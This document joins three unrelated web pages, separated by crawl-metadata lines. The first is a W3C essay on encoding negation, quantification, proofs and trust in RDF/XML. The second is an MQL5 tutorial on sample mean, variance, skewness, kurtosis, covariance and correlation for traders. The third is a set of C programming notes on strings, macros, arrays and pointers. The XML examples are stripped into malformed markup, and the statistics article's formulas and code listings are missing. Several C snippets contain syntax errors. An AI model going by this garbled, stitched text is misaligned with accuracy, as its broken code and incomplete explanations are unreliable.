to make statements about statements -- or rather, it was until Goedel. Here, the "first order" question is taken backwards, in that RDF statements already break the "first order" assumptions before basic logic has been introduced. Not extends the toolbox to propositional logic.). Of course we already have the logical "AND" construction by juxtaposition. Two statements one after the other are both to be trusted to the same extend as the context. It is difficult contemplate a logical system in which two statements cannot be considered together, so { S1, S2 } == S1 & S2 more or less defines "&", and juxtaposition already exists, we already have it. One of the simplest forms of expression is NOT(x), which maps onto XML most naturally as a single XML element: <bar id="foo" about=""> <w3c:member></w3c:member> <not> <w3c:member></w3c:member> </not> </bar> The not is transparent when it comes to the subject, but clearly not when to comes to the trust! It is an explicit assertion that the contained assertion is false. I am not proposing that the best machine in practice to process the language we are building is based directly on RDF triplets - but it is important to ground new features in basic RDF. in RDF, not can be introduced by a new property which associates a boolean truth value with another node. Actually manipulating the information in this way is of course not very efficient. <quote id="foo" about=""> <w3c:member></w3c:member> </quote> <rdf:description <truth>0</truth> </rdf:description> There is an overlap of semantics with <include>. There are therefore two ways of representing an expression containg not. The strict RDF way, in which the only data is a set of triples, involved the reification above.The way using the enhancd model simply encodes each Before not, every assertion in an RDF database could be handled independently, and deletion of a facts did not create untruth. However, with not, it can, because we need to know the full set of terms in a negated and expression to be able to deduce anything. Not is very powerful. Given not and and, as logicians and gate designers know, you can construct many things. Immediately, given that the contents of a not element are anded, we have a "nand" function. ["Nand" is the Sheffer stroke which was shown in 1913 to be the only operator needed to construct for a complete propositional logic system, and which lin the 1970s was the basic building block unit of the 7400 series logic]. With nand, you can construct, for example, or: <not> <not> <w3c:member></w3c:member> </not> <not> <w3c:member></w3c:member> </not> </not> is equivalent to "either IBM is a member of W3C or soap.com is a member of W3C". It is a little clumsy, but looks more natural if you use synonyms: <alternatives> <or> <w3c:member></w3c:member> </or> <or> <w3c:member></w3c:member> </or> </alternatives> Implication can also be constructed using not. "If soap.com is a member then IBM is a member" can be written as "it is not true that soap.com is a member and IBM is not a member", or: <not> <w3c:member></w3c:member> <not> <w3c:member></w3c:member> </not> </not> This similarly can be made more palatable to the human reader by using synonuyms for not: <if> <w3c:member></w3c:member> <then> <w3c:member></w3c:member> </then> </if> Above we had an example in which we invoked using <include> the meaning in another document.> <include rdf: </then> </if> <if> <ds:signed-by rdf:about=part2.rdf"> rsa:a/1024/123hg1238912whh3983yd2734dg </ds:signed-by> <then> <include rdf: </then> </if> </head> </foo:bar> Here the document asserts the contents of part1 only if it has a certain hash, and asserts the content of part2 only if it has a digital signature which verifies with a partuclar public key. (the ds namespace is assumed to exist to define hash and signed-by and is not frther discussed here apart from to pint out that the hash value is an existing URI md5 scheme and that the RSA key is just regarded as a URI too). What is nice about this section is that this functionality has been achieved using existing features. The two statements may be a little verbose, though it isn't obvious how one can make them very much more compact. Examples above are very specific, when in fact many rules are made about generalities. How would we add quantification to XML, the "for all" or "there exists some"? Like anything else, you can introduce it into RDF by reifiying it (to descibe the expression's structure and then assert something about the structure). Formally, then, to build it by tedious reification, one would <quote id="foo" about=""> <w3c:member></w3c:member> </quote> <rdf:description <true-for-all></true-for-all> </rdf:description> In this example (compare with the not reification above) the element expressing "W3C has a member soap" statement is given the identifier #foo, and then the assertion is made that the statement represented is true even when "" is replaced with any other value. This may not be an inutitive way of quantifying things, and the variable name may seem bizare, but it shows that we can derive quantification from a single added RDF property, "true-for-all" [note]. Quantification syntax for logic in XML It is not obvious how to add this to a practical XML-based toolbox. One can either try to layer it on to of XML, or extend XML. Here is one example of layering it on top of XML. We use an XML element for the forall clause, defining a variable at the same time in the ID space of the XML document. Any reference to that variable within the clause is to be taken torefer to the variable. > which, translated, means: For any X, if X is a member of W3C, then X has access to the member page, and there is some rep which is an advisory commitee representative for X and also is an employee of X. It is messy compared with mathematical symbols, but not compared with typical XML. The var attribute defines a variable in ID space (a subset of URI space), so must have type IDREF because to have type ID in XML has the secondary meaning of being an identifier for the element. (An alternative might be to use XML enities in a magic new form of entity &x; or to simply make a new syntax which declared $x to be a variable even tough you get really fed up with the dollar signs; or if you want in interesting one to make a namespace which is defined to consist of varibles. This latter would maybe confuse engines which didn't understand it.) (Note that the XML namespaces don't use scoping, but a "forall" clause necessarily introduces a variable which only has sitgnficance within the scope of the clause, element in this syntax. However, it may be referred to from outside when a substitution is defined. You will want to say for example "substituing "John Doe" for the variable foo.rdf#name in foo.rdf#rule1 yeilds ..." so the fact that the variable is afirst class object may possibly be useful. Beware of course that you may want in one forumula to use the quantified expression more than once using different subsitutions) In the 1.0 syntax spec there is a special syntax for a particular form of quantification <rdf:Description <s:Creator>Ora Lassila</s:Creator> </rdf:Description> This we can now explain as meaning <forall var="x"> <if> <rdf:li <then> <s:CreatorOra Lassila</s:Creator> </then> </if> </forall> A very common thing we need to express is a definitive set of things. (Examples of definitive lists: When W3C gives a list of W3C members, it can not only tell you that if someone is on the list they are a member, but also that if they are not on the list they are not. The exclusivity of a list is a statement about a document or part of a document. Here is a statement about the definitive nature of a list, followed by a list: <forall var="x"> <if rdf: <w3c:member "id=statement" about=""><var ref="#x"> </w3c:member> <then> <implies rdf: </then> </if> </forall> <foo:container <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> </foo:container> Note that just as in normal algrebra one almaost always uses "For all" with "such that", here one will almsot always use <forall> with <if> and so the two could be combined to save space into, say, <ifany> <ifany var="x" rdf: <w3c:member "id=statement" about=""><var ref="#x"> </w3c:member> <then> <implies rdf: </then> </ifany> <foo:container <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> </foo:container> This is done using features defined to date. (It is a little verbose, but we could make a shorthand for the expression "list A is object-definitive for B", meaning "If list A implies the statement <B about=x value=V> for some (x,V) then it will also imply any statement <B about=y value=V> which is true. In other words, "ibm is a member of w3c" in a object-definitive list means that the list will include all members of w3c, wheras in a subject-definitive list it implies that the list contains all things ibm is a member of <foo:container <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> <w3c:member>"</w3c:member> </foo:container> <object-definitive:w3c:member </object-definitive> ) A function is the ability to encapsulate meaning with the extraction of parameters to be specified later. This could map onto RDF and XML in a number of ways, just as practical languages have various forms of function. When looking at the expoesion of data, a function becomes a compact expression of a common expression. The shorthand expression can take many forms (positional or names parameters) but a clear choice for RDF is an RDF node, whose actual arguments [the things which at function invokation replace the formal parameters] are provided by a set of properties of that node. The equivalent of the function "body" is then a set of information which can be deduced from the node. An interesting point of the semantic web philosophy is that, while one might think of "the" meaning of a function, in fact the inference rules which express that are those provided by the functions creator, but any other document might add its own rules. In other words, the function body is not a very useful term, and any expression about the function will do. The example above > in fact is an example. It states some implications of the concept of membership of W3C. You could take this to be definitive, but that is really part of the trust model rather than the language. In other words, W3C might say that if an organization is a member of W3C then it has an AC representative who is an employee. Another may maintian that any organization which is is a member of W3C conmtains at least one smart employee. I would expect that, where particular RDF nodes are intended to express particular things by their creators, that the schema would have at least a pointer to those things. In the above example, the inference was just from a property of membership: a property is used as binary predicate, but in general n-ary form with multiple parameters could look like: <forall var="x" v2="y" v3="z" rdf: <if> <employee> <name>#y</name> <street>#s</name> <zip>#z</zip> <employee> <then> [...] </then> </if> </forall> The basic RDF utility allows us to write all kinds of forms, and it may be useful to pick one to make a common form. In the example above, the rule applied to any node which is the employee (of anything) and has a name and a street. The property name "employee" is used like a function name. We can use types for this instead: <forall var="x" v2="y" v3="z" rdf: <if> <rdf:type></> <z:name>#y</> <z:street>#s</> <z:zip>#z</> <then> [...] </then> </if> </forall> Here the rule applies to any node which has been explicitly given the type empType and has the given parameters. Of course, these two things are linked by the RDF schema type properties. <rdfs:range</a> (sp?) is a way of saying <forall var="x" v2="y" rdf: <if> <employer>#y</employer> <then> <rdf:type></rdf:type> </then> </if> </forall> In fact, while we are talking about functions we can use what we have now to define bits of RDF Schema specification: we can start by defining what "range" of a property means: <forall var="aPropertyName" v2="y" v3="aType" rdf: <if> <rdfs:range#aType</a> <then> <if> <#aPropertyName>#y</> <!-- oops! -> <then> <rdf:type</rdf:type> </then> </then> </if> </forall> I knew we would need a way of invoking an RDF assertion by its full ID. This is the identifier problem introduced above. <#aPropertyName>#y</> <!-- oops! -> is what we need, and we can't in XML but we can instread define in the basic RDF syntax an XML element to do that <rdf:property#y</> <!-- better! -> which is not as clean in the sense of a consistent language but is but good XML. @@@ There are times when you may know that every person has a mother and you may know that a person's mother is unique and so it is convenient to save the bother of writing "for any x such that x is a's mother" and simply refer to a's mother. (This is similar in concept to skolem functions used to remove quantifiers from expressions in symbolic logic.) Maybe time for an XML shortcut: <the pname="#mother" of="#a"> can be thought of as a query as well. It is well defined when the property is unique, but when a property is not unique then it is not obvious what sort of implicit quantification should be implied, and what the scope of it would be ... not obvious. Two choices appear to match the choice of definite and indefinite article in natural languages: The latter is the way it is usd in Skolemization, and I think we should stick to that. Note that are NOT functions. They are not part of the language. They are shortcuts. This is not about constructing a proof, but about transmitting a proof to be validated. To define the proof language, one must define the powers of the proof checking machine. In other words, do you have to spoon-feed it every atomic step, or is there a certain jump which it can make? This decision does not have to be fundamental, in that you can imagine different vocabularies for expressing a proof to different engines which have different capability. At one extreme is the simplest logical engine for which everything must be reduced to a connonical form of binary operators. At the other extreme is the proof "A follows-indirectly-from B" which involves the proof checker in extensive (but bounded, or we don't call it a proof) searches. In between lies the sound engineering compromise. This will not be rigorous derivation, but a . [@@ref] Now we need an expression to lead the proof-checker through a proof. Let's assume taht canonicalization isimplciit in that it just involves resolving relative URIs, and that otherwise exact string commparison implies equivalence. (In practice there are often different URIs which yield the same result but that can be an equivalence statement we can explicitly make if ever we need to) In the case that a given document [fragment] allows the proof checker to deduce the required result directly, then all one needs is a single RDF assertion to point it at the source from which it follows. We therefore introduce the <follows-from> assertion All the information A was derived from information in B. This is a tool for the "oh, yeah?" button. It allows one to trace back to the origin of an assertion or assertions. In order to verify the assertions, the A is abandoned as being only a hint, and B is parsed to extract the same meaning, and then verified. No representation is made about the language in which B is written or why B should be believed. <a:record <w3c:member></w3c:member> </a:record> <rdf:description <follows-from></follows-fromsource> </rdf:description> The assertion that IBM is a member of W3C is implied by the W3C membership list. (Does the document assert that you can still deduce the statements from the document? Yes, formally - an assrtion is an assertion. However, if you don't trust the current document, typically you treat it as an invitation to check the URI given. Later we must deal with expiry with time and "I found yyy in xxx but don't trust me: you check" statements which do not lend explicit credance.) ...... @@@@@@ The above deals with logic, when in fact any deducion in the real world or on the Web is in fact made according to rules of trust. On the Web, trust is enhanced by the power of public key cryptography, and in particular, digital signature. The W3C Signed XML activity defines ways of signing an XML document so that it can be shown to have been signed by the private key corresponding to a give public key. The following is a model of trust which seems powerful and seems general. The basic concept is that of a statement being "assured by" a set of keys. This is a new word and if you can thing of a better one, let me know. It means that the statement either has been made in a document (or part of a document) whose signature has been verified with the key, or it has been logically derived from such statements. When it is logically derived from a combination of statements assured by different sets of keys, then it is assured by the union of the sets. (You can think about it in terms of belief if you like, that if you believe all the keys in the set you will believe the statement, but that is not a useful analogy, as the model does not require agents to actually "believe" anything). While from the rules defining assurance you might expect a logical processor to accumulate a larger and larger key set as information is drawn in from more and more sources, in fact the key set can reduce too. Suppose you have found on the web statment A signed by key Ka, and statment B signed with key Kb. If a third statement, signed with key K, says, "If A is signed with Ka it is true, and if B is signed by Kb it is true," then you can deduce A and B assured by K. I would expect a typical trust engine to have one key which it trusts basially from installation. For a webserver, for example, the webmaster holds the key. The server will only act on something which is assured by that key. The various configuration files then contain trust rules which delegate responsability for particular aspects of operation. Many trust engines (whether or not they think of themselves as trust engines) use simpler rules which are specicializations of this general model. One is the simple trust boundary: "Trust the following keys for anything, anything else for nothing". This is typical of the configuration of a web browser for trusting applets. It obviously works because it is only reposible for a certain decisions, and in fact the user is also involved with every one as well - before the downloaded code is executed. (This binary model of trust leads to that binary concept of "belief") The most general rule I can think of is of the form "if a statement of the form x follows from key set y then deduce f(x)." This would, of course, typically be signed with another key. (If we assume a key is a URI then we can declare keysets as URIs too, by just using unique identifiers. This means that the problem of dealing with sets can be hidden from the logic if we need to simplyify it. We just declare a key set, give it mid: URI, and declare which RSA (say) keys it contains. I don't think the key set idea is very fundamental - we just seem to need it for completeness, so that we can extract the assuring keys from sperate statements: from "A assues S and B assureds T", deduce "set {A B} assures S and T". Maybe we can get away without that extraction, using nesting instead, `A assures `B assures S & T' ') @@ homework: express published trust models in this general trust model. Examples of trust rules "If K assures that y is a member of w3c then they are" Doing this without any extra <ifany varid="x'> @@@@@@ <then> </then> </ifany> XML is clearly a (terrible, great) way of representing formal logic and trust. These are some random assertions about assertions, in particular the ropilogy of th DLGs which they make and the inferences which can be directly made. Within this list, the semenatics are expliand for when the assertion is made about A and the property is given as having value B. Semantics: Any assertion using the property type A implies an assertion with the same subject node and value but with property type B. Comment: Domain and Range: The subject and object must both identify RDF assertions. Example <implies rdf: If A is "from" B then A is repsonsible for B in this vocabulary. Semantics: Any assertion using the property type A implies an assertion with property type B in the reverse direction - ie whose subject was the value of A and whose value was the subject of A. Comment:Domain and Range: The subject and object must both identify RDF assertions. Note some relations are self-inverse. "Inverse" is self-inverse. <implies rdf:If A is "part-of" B then A "includes" B in this vocabulary. ...@@@ [Notes Thanks to Dan Connolly for pointing this out. these always seem to diappear... theer are many small lists of these, all different. Ban logic@@ Appel'set al. work at Princeton on Proof-Carrying Authentication: Proof-Carrying Authentication. Andrew W. Appel and Edward W. Felten, 6th ACM Conference on Computer and Communications Security, November 1999.
http://www.w3.org/DesignIssues/Toolbox.html
CC-MAIN-2014-42
refinedweb
5,260
57.61
Syntax: #include <list> iterator end(); const_iterator end() const; The end() function returns an iterator just past the end of the list. Note that before you can access the last element of the list using an iterator that you get from a call to end(), you'll have to decrement the iterator first. For example, the following code uses begin() and end() to iterate through all of the members of a vector: vector<int> v1( 5, 789 ); vector<int>::iterator it; for( it = v1.begin(); it != v vector, the loop will only stop once all of the elements of the vector have been displayed. end() runs in constant time. Related Topics: begin, rbegin, rend
http://www.cppreference.com/wiki/stl/list/end
crawl-002
refinedweb
113
61.67
Introduction What is statistics? Here is the definition found on Wikipedia: "Statistics is the study of the collection, organization, analysis, interpretation, and presentation of data." (Statistics). This definition suggests three main components of statistics: data collection, measurement and analysis. Data analysis appears to be especially useful for a trader as information received is provided by the broker or via a trading terminal and is already measured. Modern traders (mostly) use technical analysis to decide whether to buy or sell. They deal with statistics in virtually everything they do when using a certain indicator or trying to predict the level of prices for the upcoming period. Indeed, a price fluctuation chart itself represents certain statistics of a share or currency in time. It is therefore very important to understand the basic principles of statistics underlying the majority of mechanisms that facilitate the decision making process for a trader. Probability Theory and Statistics Any statistics is the result of change in the states of the object that generates it. Let us consider a EURUSD price chart on hourly time frames: In this case, the object is the correlation between two currencies, while the statistics is their prices at every point of time. How does the correlation between two currencies affect their prices? Why do we have this price chart and not a different one at the given time interval? Why are the prices currently going down and not up? The answer to these questions is the word 'probability'. Every object, depending on probability, can take one or another value. Let us do a simple experiment: take a coin and flip it a certain number of times, every time recording the toss outcome. Suppose we have a fair coin. Then the table for it can be as follows: The table suggests that the coin is equally likely to come up heads or tails. Any other outcome is not possible here (landing on the coin's edge has been excluded a priori) as the sum of probabilities of all possible events shall be equal to one. Flip the coin 10 times. Now let us look at the toss outcomes: Why do we have these results if the coin is equally likely to land on either of the sides? The probability of the coin to land on either of the sides is indeed equal, which however does not mean that after a few tosses the coin shall land on one side as many times as on the other side. The probability only shows that in this particular attempt (toss) the coin will land either heads up or tails up and both events stand equal chances. Let us now flip the coin 100 times. We get the new table of outcomes: As can be seen, the numbers of outcomes are again not equal. However, 53 to 47 is the result that proves the initial probability assumptions. The coin landed on heads in nearly as many flips as it did on tails. Now let us do the same in the reverse order. Suppose we have a coin but the probability of landing on its sides is unknown. We need to determine if it is a fair coin, i.e. the coin that is equally likely to come up heads or tails. Let us take the data from the first experiment. Divide the number of outcomes per side by the total number of outcomes. We get the following probabilities: We can see that it is very difficult to conclude from the first experiment that the coin is fair. Let us do the same for the second experiment: Having these results at hand, we can say with a high degree of accuracy that this is a fair coin. This simple example allows us to draw an important conclusion: the bigger the number of experiments, the more accurately the object properties are reflected by statistics generated by the object. Thus, statistics and probability are inextricably intertwined. Statistics represents experimental results with an object and is directly dependent on probability of the object states. Conversely, the probability of the object's states can be estimated using statistics. Here is where the main challenge for a trader lies: having data on trades over a certain period of time (statistics), to predict the price behavior for the following period of time (probability) and based on this information to make a buy or sell decision. Therefore, getting back to the points made in Introduction, it is also important to know and understand the relationship between statistics and probability, as well as to have knowledge of risk assessment and risk situations. The latter two are however out of the scope of this article. Basic Statistical Parameters Let us now review the basic statistical parameters. Suppose we have data on height in cm regarding 10 people in a group: The data set forth in the table is called sample, while the data quantity is the sample size. We will take a look at some parameters of the given sample. All parameters will be sample parameters as they result from the sample data, rather than random variable data. 1. Sample mean Sample mean is the average value in the sample. In our case, it is the average height of people in the group. To calculate the mean, we should: - Add up all sample values. - Divide the resulting value by the sample size. Formula: Where: - M is the sample mean, - a[i] is the sample element, - n is the sample size. Following the calculations, we get the mean value of 174.5 cm 2. Sample variance Sample variance describes how far sample values lie from the sample mean. The larger the value, the more widely the data is spread out. To calculate the variance, we should: - Calculate the sample mean. - Subtract the mean from each sample element and square the difference. - Add up the resulting values obtained above. - Divide the sum by the sample size minus 1. Formula: Where: - D is the sample variance, - M is the sample mean, - a[i] is the sample element, - n is the sample size. The sample variance in our case is 113.611. The figure suggests that 3 values are widely spread out of the mean which leads to the large variance value. 3. Sample skewness Sample skewness is used for describing the degree of asymmetry of the sample values around its mean. The closer the skewness value is to zero, the more symmetrical the sample values are. To calculate the skewness, we should: - Calculate the sample mean. - Calculate the sample variance. - Add up cubed differences of each sample element and the mean. - Divide the answer by the variance value raised to the power of 2/3. - Multiply the answer by the coefficient equal to the sample size divided by the product of the sample size minus 1 and sample size minus 2. Formula: Where: - A is the sample skewness, - D is the sample variance, - M is the sample mean, - a[i] is the sample element, - n is the sample size. We get a quite small value of skewness for this sample: 0.372981. This is due to the fact that divergent values compensate each other. The value will be larger for asymmetrical sample. E.g. the value for the data as below will be 1.384651. 4. Sample kurtosis Sample kurtosis describes the peakedness of the sample. To calculate kurtosis, we should: - Calculate the sample mean. - Calculate the sample variance. - Add up the fourth-power differences of each sample element and the mean. - Divide the answer by the squared variance. - Multiply the resulting value by the coefficient equal to the product of the sample size and the sample size plus 1, divided by the product of the sample size minus 1, sample size minus 2 and sample size minus 3. - Subtract from the resulting value the product of 3 and the squared difference of the sample size and 1, divided by the product of the sample size minus 1 and sample size minus 2. Formula: Where: - E is the sample kurtosis, - D is the sample variance, - M is the sample mean, - a[i] is the sample element, - n is the sample size. For the given height data, we get the value of -0.1442285. For a sharper peak data, we get a larger value: 10. 5. Sample covariance Sample covariance is a measure indicating the degree of linear dependence between two data samples. Covariance between linearly independent data will be 0. To illustrate this parameter, we will add weight data for each of the 10 persons: To calculate covariance of two samples, we should: - Calculate the mean of the first sample. - Calculate the mean of the second sample. - Add up all products of two differences: the first difference - an element of the first sample minus the mean of the first sample; the second difference - an element of the second sample (corresponding to the element of the first sample) minus the mean of the second sample. - Divide the answer by the sample size minus 1. Formula: Where: - Cov is the sample covariance, - a[i] is the element of the first sample, - b[i] is the element of the second sample, - M1 is the sample mean of the first sample, - M2 is the sample mean of the second sample, - n is the sample size. Let us calculate the covariance value of the two samples: 91.2778. The existing dependence can be shown in the combined chart: As can be seen, the increase in height (as a rule) corresponds to the decrease in weight and vice versa. 6. Sample correlation Sample correlation is also used to describe the degree of linear dependence between two data samples but its value always lies within the range of -1 to 1. To calculate correlation of two samples, we should: - Calculate the variance of the first sample. - Calculate the variance of the second sample. - Calculate covariance of these samples. - Divide the covariance by the square root of the product of the variances. Formula: Where: - Corr is the sample correlation, - Cov is the sample covariance, - D1 is the sample variance of the first sample, - D2 is the sample variance of the second sample, For the given height and weight data, correlation will be equal to 0.579098. How to Use Statistics in Trading The simplest example illustrating the use of statistical parameters in trading is the MovingAverage indicator. Its calculation requires data over a certain period of time and gives the arithmetic mean value of the price: Where: - MA is the indicator value, - P[i] is the price, - n is the MA measurement period We can see that the indicator is a complete analog of the sample mean. Despite its simplicity, this indicator is used when calculating EMA, the exponential moving average which, in turn, is a basic element required for the MACD indicator - a classical tool for determining the trend strength and direction. Statistics in MQL5 We will look at the MQL5 implementation of the basic statistical parameters described above. The statistical methods reviewed above (and a lot more) are implemented in the statistical functions library statistics.mqh. Let us review their codes. 1. Sample mean The library function calculating the sample mean is called Average: Input data: data sample. Output data: mean. 2. Sample variance The library function calculating the sample variance is called Variance: Input data: data sample and its mean. Output data: variance. 3. Sample skewness The library function calculating the sample skewness is called Asymmetry: Input data: data sample, its mean and variance. Output data: skewness. 4. Sample kurtosis The library function calculating the sample kurtosis is called Excess (Excess2): Input data: data sample, its mean and variance. Output data: kurtosis. 5. Sample covariance The library function calculating the sample covariance is called Cov: Input data: two data samples and their respective means. Output data: covariance. 6. Sample correlation The library function calculating the sample correlation is called Corr: Input data: covariance of two samples, variance of the first sample and variance of the second sample. Output data: correlation.Let us now input height and weight sample data and process it using the library. #include <Statistics.mqh> //+------------------------------------------------------------------+ //| Script program start function | //+------------------------------------------------------------------+ void OnStart() { //--- specify two data samples. double arrX[10]={173,162,194,181,186,159,173,178,168,171}; double arrY[10]={65,70,83,60,105,58,69,90,78,65}; //--- calculate the mean double mx=Average(arrX); double my=Average(arrY); //--- to calculate the variance, use the mean value double dx=Variance(arrX,mx); double dy=Variance(arrY,my); //--- skewness and kurtosis values double as=Asymmetry(arrX,mx,dx); double exc=Excess(arrX,mx,dx); //--- covariance and correlation values double cov=Cov(arrX,arrY,mx,my); double corr=Corr(cov,dx,dy); //--- print results in the log file PrintFormat("mx=%.6e",mx); PrintFormat("dx=%.6e",dx); PrintFormat("as=%.6e",as); PrintFormat("exc=%.6e",exc); PrintFormat("cov=%.6e",cov); PrintFormat("corr=%.6e",corr); } After executing the script, the terminal will produce the results as follows: The library contains a lot more functions the descriptions of which can be found in CodeBase -. Conclusion Some conclusions have already been drawn at the end of the "Probability Theory and Statistics" section. In addition to the above, it would be worth mentioning that statistics, like any other branch of science, shall be studied starting with its ABCs. Even its basic elements can facilitate the understanding of a great deal of complex things, mechanisms and patterns which at the end of the day can be extremely necessary in trader's work. Translated from Russian by MetaQuotes Software Corp. Original article:
https://www.mql5.com/en/articles/387
CC-MAIN-2016-40
refinedweb
2,263
53.81
Asserting Prior to c99, assert needed an integral constant so had to write:: assert(NULL!=p); modern way: assert(p && "Valid pointer..."); as the string (which always evaluates to true) now appears in the errorfile. Remember to compile with NDEBUG defined to remove assertions. Initialising To avoid magic numbers, rather than do Paper(10,0) or commenting do: const size_t X_CM = 10; const size_t Y_CM = 20; Paper(X_CM, Y_CM); or if not a constant:: size_t x_cm = 0; // not const Paper(x_cm=10, ...) Paper(x_cm=20, ...) Remember sizeof is a compile time operator not a function so you can do:: Buffer *buf = malloc(sizeof *buf) and avoid specifying sizes twice, you still often see people write sizeof(Buffer) Initialising compound types:: struct WeatherNode { double todaysHigh; struct WeatherNode *nextWeather; }; dont do: struct WeatherNode node; memset(&node, 0, sizeof node) because all bits zero does not necessarily represent zero in floating point etc., instead: struct WeatherNode node = {0}; or, if you need to zeroise it at some later stage of the code then: const struct WeatherNode zeronode = {0}; ... memcopy(&node, &zeronode, sizeof node); Right-Left-Rule To read a complex cast expression - Start with the identifier, - look right, and then look left - repeat last step Interpret * as a pointer with the lowest precidence. e.g. if you’ve got a pointer to a block of memory ptr=(int*)malloc(51200), to call a function requiring a 2D with dimensions 100 by 512 which is declared as: void fff(int array[][512]) you must cast the call as fff( (int (*)[512]) ptr); Right left rules says… No identifier, start with the innermost * (*) its a pointer (*) [512] a pointer to an array of 512, int (*) [512] a pointer to an array of 512 integers. Linked lists Define using: typedef struct node *NODEPTR; struct node { char *item; NODEPTR next; }; This declares a new typedef name involving struct node even though struct node has not been completely defined yet; this is legal. Alternatively:: struct node { char *item; struct node *next; }; typedef struct node *NODEPTR; A standard structure initialisation idiom:: struct FontFamilyInfo { const char* name; int family; }; const FontFamilyInfo FamilyInfo[] = { {"DECORATIVE", FF_DECORATIVE}, {"MODERN", FF_MODERN}, {"ROMAN", FF_ROMAN}, {"SCRIPT", FF_SCRIPT}, {"SWISS", FF_SWISS} }; const int nFamilyInfo = (sizeof FamilyInfo) / (sizeof FamilyInfo[0]); Variable args e.g. pass list of strings #include <stdarg.h> char ttt(char first, ...) { size_t len; char *p, va_list argp; if(first == NULL) return NULL; len = strlen(first); va_start(argp, first); while((p = va_arg(argp, char *)) != NULL) len += strlen(p); va_end(argp); ... then call like char *str = tt("Hello, ", "world!", (char *)NULL); Macros In #define statements ‘#’ gets expanded into the argument surrounded by quotes so:: #define TEST(a,b) printf(#a "<" #b "=%d\n", (a)<(b) ) gives e.g. TEST(0, 0xFFF) -> printf("0" "<" "0xFFF" "=%d\n", (0)<(0xFFF)); ## is like a concatenation operator (must be in the middle of something) and is useful for forming variable names e.g.:: #define TEMP(i) temp ## i TEMP(i) = TEMP(2 + k) + x; -> temp1 = temp2 + k + x; Variable Length Arrays In C99, can do:: void f(int r, int c, int a[c][r]) which would have a prototype:: void f(int, int, int[*][*]); to indicate variable lengths. But note r & c must come before a!! Pointer to Functions #include <stdio.h> #include <math.h> main() { double (*ptr)(double) = sin;//pointer to a function float (*fptr)(float) = (float (*)(float))sin; //casting double a = (*ptr)(1.0); a = ptr(1.0); // alternative shorthand to above float b = (*fptr)(1.0); printf("a is %lf, b is %f\n", a, b); } Calling a function via its name – keep a table:: int func(), anotherfunc(); struct { char *name; int (*funcptr)(); } symtab[] = { "func", func, "anotherfunc", anotherfunc, }; Then, search the table for the name, and call via the associated function pointer. Array References *(a+k) is the same as a[k], or *(k+a) or k[a]:: int calendar[12][31]; int *p; p = calendar; // illegal since calendar converts // to a pointer to an array int (*monthp)[31]; monthp = calendar; // ok When allocating memory for strings, remember to allocate LENGTH+1 to allow for . There is no way to pass an array to a function directly: it is immediately converted to a pointer, so a definition:: int strlen(char s[]) eqv. strlen(char *s) main(int argc, char *argv[]) eqv. main(int argc, char **argv) –n >=0 subtracts one from and compares the result to zero, whereas n– >0 saves n, subtracts one from n, and then compares the saved value with 0, so the former is potentially faster.:: char *p = "some string"; while(*p++); p is now pointing to 1 _past_ the NULL; (so probably want to back up with p–) Strings char *p = "..."; // maybe writable (string literal might be in read-only memory) char p[] = "..."; // always writable - string is used as an array initialiser const char p[] = "..."; // never writable No case insensitive string comparison, have to use strcasecmp (unix) or strcmpi (win32). char *p = NULL; // is a null character pointer, which is not the same as... char *p = ""; // which is a pointer to an empty string ie. a pointer to a NULL when passing null as an argument use ttt((char *)0); Security problems with strings – strcpy(aaa, bbb) will keep going until it finds a NULL pointer. (Note use memove instead of strcpy if the strings might overlap in memory) char aaa[10]={"1234567890"} // copies 10 characters without the trailing NULL. // so use strncpy instead, but... strncpy(bbb, aaa, 5) // does not NULL terminate bbb if using strncpy do:: char buf[6]; buf[5]=0; strncpy(buf,"welcome",5); You get [w][e][l][c][o][\0] or maybe:: char dest[N+1]; strncpy(dest, src, N)[N]=0 since dest is returned from strncpy. Don’t do:: char buf[100]; strncpy(buf,src,sizeof(buf)); buf[ sizeof(buf)-1 ] = 0; because that may get changed to:: char *buf = malloc(512); in which case sizeof(buf) will be 4!!! Also note: the sizeof operator does not work with arrays passed as function arguments: since only a pointer is passed. BSD’s use strlcpy, strlcat etc. For sprintf:: char buf[BUFFER_SIZE]; sprintf(buf, "%*s", sizeof(buf)-1, "long-string"); /* WRONG */ sprintf(buf, "%.*s", sizeof(buf)-1, "long-string"); /* RIGHT */ but again if buf is malloc’ed sizeof wont work. Incidentally sizeof(char) is, by definition, exactly 1. External Functions In C, a global const has external linkage even without extern (in C++ it doesnt). In C, ‘static’ is used to make a global local to that file (in C++ use namespaces). Arrays The last specified array argument changes fastest, opposite to FORTRAN. An array of 2 rows and 3 columns – aaa[2][3]then element [i][j]can be calculated by i*3+j so the first dimension is not used. To create a multidimensional array (from cfaq…) #include <stdlib.h> int **array1 = malloc(nrows * sizeof(int *)); for(i = 0; i < nrows; i++) array1[i] =; The rule by which arrays decay into pointers is not applied recursively. An array of arrays (i.e. a two- dimensional array in C) decays into a pointer to an array, not a pointer to a pointer. If you are passing a two-dimensional array to a function: int array[NROWS][NCOLUMNS]; f(array); the function’s declaration must match: void f(int a[][NCOLUMNS]) { ... } or void f(int (*ap)[NCOLUMNS]) /* ap is a pointer to an array */ getline Only use fgets if you are certain the data read cannot contain a null; otherwise, use getline (but that is gnu only!). also be careful of scanf especially on stdin since it leaves characters behind which mess up later input.. better to use fgets + sscanf char answer[100], *p; printf("Type something:\n"); fgets(answer, sizeof answer, stdin); if((p = strchr(answer, '\n')) != NULL) *p = ''; printf("You typed \"%s\"\n", answer);
https://rcjp.wordpress.com/notes/cc/
CC-MAIN-2017-26
refinedweb
1,300
60.24
